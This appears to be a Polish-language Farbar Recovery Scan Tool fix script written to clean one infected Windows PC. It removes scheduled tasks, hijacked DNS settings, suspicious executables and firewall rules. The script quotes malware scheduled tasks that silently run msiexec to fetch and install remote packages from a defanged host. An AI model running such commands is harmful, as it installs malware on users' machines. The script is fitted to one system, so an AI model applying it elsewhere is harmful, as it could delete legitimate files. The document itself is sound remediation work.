CloseProcesses:
CreateRestorePoint:
EmptyTemp:
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\...\MountPoints2: {d28d5708-70a2-11e9-8253-54e1ad37d8c9} - "G:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\...\MountPoints2: {ebcb9655-4114-11e9-8249-54e1ad37d8c9} - "E:\HiSuiteDownLoader.exe" 
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.me vpn.lnk [2018-06-10]
ShortcutTarget: hide.me vpn.lnk ->  (Brak pliku)
GroupPolicy: Ograniczenia ? <==== UWAGA
GroupPolicy\User: Ograniczenia ? <==== UWAGA
Task: {02D0BE1F-6DA9-40A6-884A-0117C668FBDB} - System32\Tasks\Opera scheduled Autoupdate 1555496896 => C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe [1519640 2019-07-03] (Opera Software AS -> Opera Software)
Task: {2DC9C70D-5375-48D3-9C03-2BF318A3D057} - System32\Tasks\{4F04615B-4F86-A938-1472-6495690C244B} => C:\Program Files\Opera\Launcher.exe
Task: {2F1CB3F8-F14C-477A-A08D-719B5BA3B4DB} - System32\Tasks\atuspirahjizy => "msiexec" /q -package hxxps://guardname.net/ireojlqn.vao <==== UWAGA
Task: {3EFC394D-C0A1-41F5-9305-8E9CCDBCAC51} - System32\Tasks\uaieoe => "msiexec" -package hxxps://guardname.net/lnopgvliuepry.ito /q <==== UWAGA
Task: {631A661E-E721-48C3-85B4-9F44BEE0D0B4} - System32\Tasks\GoogleCheckService => C:\Users\Admin\AppData\Local\Programs\Opera\58.0.3135.127\opera.exe <==== UWAGA
Task: {64C1418E-014A-4557-A68D-DB9F826005F9} - System32\Tasks\{55F6BAE8-1E3E-EBC1-ACA9-04F792F189D0} => C:\Users\Admin\YYiiRubU.exe
Task: {AC22B376-CEAA-4841-98CB-FCBA3BD21B8F} - System32\Tasks\{987801ED-4C56-F6FF-CA13-E3A13116E3CD} => C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe [59904 2018-04-12] (Microsoft Windows -> Microsoft Corporation) <==== UWAGA
Tcpip\..\Interfaces\{00664684-73f1-4cba-aa09-d11d6f3938c9}: [NameServer] 208.67.222.222 208.67.220.220
Tcpip\..\Interfaces\{1f5df075-51bc-4453-827f-885c1e62f828}: [NameServer] 208.67.222.222 208.67.220.220
Tcpip\..\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}: [NameServer] 95.216.188.196,185.4.64.13,185.162.128.148,208.67.222.222,208.67.220.220
Tcpip\..\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}: [DhcpNameServer] 150.204.1.2
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
SearchScopes: HKU\S-1-5-21-2392927722-2977143306-2196907431-1001 -> DefaultScope {0A2E1844-0585-446D-B39E-4DD1FED6B322} URL = 
SearchScopes: HKU\S-1-5-21-2392927722-2977143306-2196907431-1001 -> {0A2E1844-0585-446D-B39E-4DD1FED6B322} URL = 
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} -  Brak pliku
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
2019-01-13 20:52 - 2019-03-23 14:00 - 006387208 _____ () C:\Users\Admin\AppData\Local\dump007.dat
2018-04-12 01:34 - 2018-04-12 01:34 - 000059904 ____N (Microsoft Corporation) C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe
2018-08-18 15:51 - 2018-08-18 15:51 - 000000002 _____ () C:\Users\Admin\AppData\Local\imw.ini
2018-09-27 15:25 - 2018-04-12 01:34 - 001626536 _____ (Microsoft Corporation) C:\Users\Admin\AppData\Local\user32.dll
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
AlternateDataStreams: C:\Users\Admin\Desktop\Tobiasz.jpeg:3or4kl4x13tuuug3Byamue2s4b [87]
AlternateDataStreams: C:\Users\Admin\Desktop\Tobiasz.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
FirewallRules: [{A6A5C7A9-027C-4F42-B541-F2D562CDB229}] => (Allow) LPort=8318
FirewallRules: [{03E16E48-3B2F-4299-9D9B-C178D808E40D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{CF48F6C4-858E-4E73-A933-A71F1F6F4FEE}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{64D280BB-BC56-4A29-8095-97627A02F28D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{B4E0157D-362D-4F31-93FB-A738B532D361}] => (Allow) C:\WINDOWS\SysWOW64\EdCFORXI.exe (Microsoft Corporation) [Brak podpisu cyfrowego]
FirewallRules: [{37142FAD-4D3C-4991-8CCD-54E2A556D162}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5B4E7D8A-B6FF-4219-A7B8-84BDA65D21C7}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0ECE455A-0DF1-4529-85A9-B356C51AB0AB}] => (Allow) C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{ACD8B314-E01F-476A-AA61-D6C350FEB771}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{F0E66E77-806F-4A19-84BA-1EEBF76D4704}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{E18CB599-659E-4288-855B-035B26940DCD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{72830BD2-1A95-43F3-BF8F-804003820D45}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{3DF174C1-ABB4-4BD0-A38F-880CB104A5A5}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D8FCF870-ED67-414A-A813-2786CF4A03B0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{917D6863-D5F5-4FC0-B1B6-F142306DE630}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5AA4C11C-BFF9-4D8A-ACD9-462B7A1558DC}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D21E1A99-3F8B-488B-9092-43E05A791718}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{75C2FF55-35B8-4BBE-8A80-70A97CFDD3B9}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{2AC51EDF-E7AF-4A15-85B3-E36EF0FD0A06}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{47260107-8610-4B2D-86D8-A482C109EE1A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{6D0E8727-8D15-4B68-96E0-B760C23F4897}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{115C1C19-86D9-4C46-B6A7-06865E5A617D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{0A851A54-5ADF-45A8-A289-169AF0E4AAA0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{C7E30ACE-DABD-4219-AAF4-53E3192A3488}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{382BAA1D-2454-4607-AFF9-2013F9C517A5}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{E4A66AE3-F9DD-442C-9DB4-1DC8450A9101}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{9C72FBB1-9B02-4D58-B759-EB46EE0FA165}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{2EB3AE89-1765-4A40-8C2E-AC80BB26DD7E}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{05458F64-71B7-4D7B-B787-50DEF3E7DC17}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{66422008-3EAC-430D-A4F3-E8789E4EBFEA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{528EC959-68F4-4299-B77A-51BD0FFAB752}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{D24C728C-7AF4-4667-9C60-4AE4BFFDC5BE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{824589D8-984E-4791-9AA2-0AF6AB96114D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{BC439E86-3C2D-487D-90CD-A8027DCD0163}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{FA7E57DE-46E9-44CC-90A1-C12FD2953734}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{B27242ED-E50E-4991-BEF1-5D36B6767A8A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{CCB36B66-169F-48AE-8335-FB65681580C3}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{B2F714ED-70E7-4302-9A1E-317DCD60FD3E}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{EB151E14-9252-43D5-B5D7-95CB5A99BAE1}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{90358491-0F7E-4902-9E7A-387A36921D8B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{BD26266C-9665-49F5-BB53-9A6D5F1440E1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{15BBFBDA-FC59-4850-BE98-96D862905272}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{183568B8-EC84-4799-A0A0-6118469003BD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{9C431AB2-41D6-4B90-AF9C-28373F77D83D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{F04F5A38-DC16-414D-B0AD-BD65FD675285}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{17146151-E038-482B-ABBF-1C65287CF97D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{0C886FE7-BC52-4F4B-BF80-48350FF7DFC9}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{47A422BE-ADBB-49AD-A26C-F9F2785101BA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{A3AD3CFA-F373-40E5-818A-DF60D217637B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{45F871DF-A008-4433-8F52-589FA43D706C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{CC4D3F11-73B5-46C4-AD72-AA8D5A30541B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{408F5652-536C-47D8-A149-D9DEE0526756}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{C9334AA3-9765-4478-A9D6-8F714A7223DF}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{71E63A59-3089-4274-9D33-3AD38A2BD5B6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{79F00C57-D74A-4787-9048-855974AD2632}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{4AB41BFF-B4BB-470B-9E3C-1D67658152A6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{E6ADA24F-2F38-4030-BBB1-5F90E4D39666}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{4BEBC431-FB63-4CBF-A456-4ED8E79F2154}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{4C098975-9938-4F0D-BB32-725DC1EA1DC4}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
Hosts:
RemoveProxy:
CMD: netsh int ip reset
CMD: ipconfig /flushdns
FilesInDirectory: C:\Users\Admin\AppData\Local\*.exe;*.dll;*.ini
FilesInDirectory: C:\Users\Admin\*.exe;*.dll;*.ini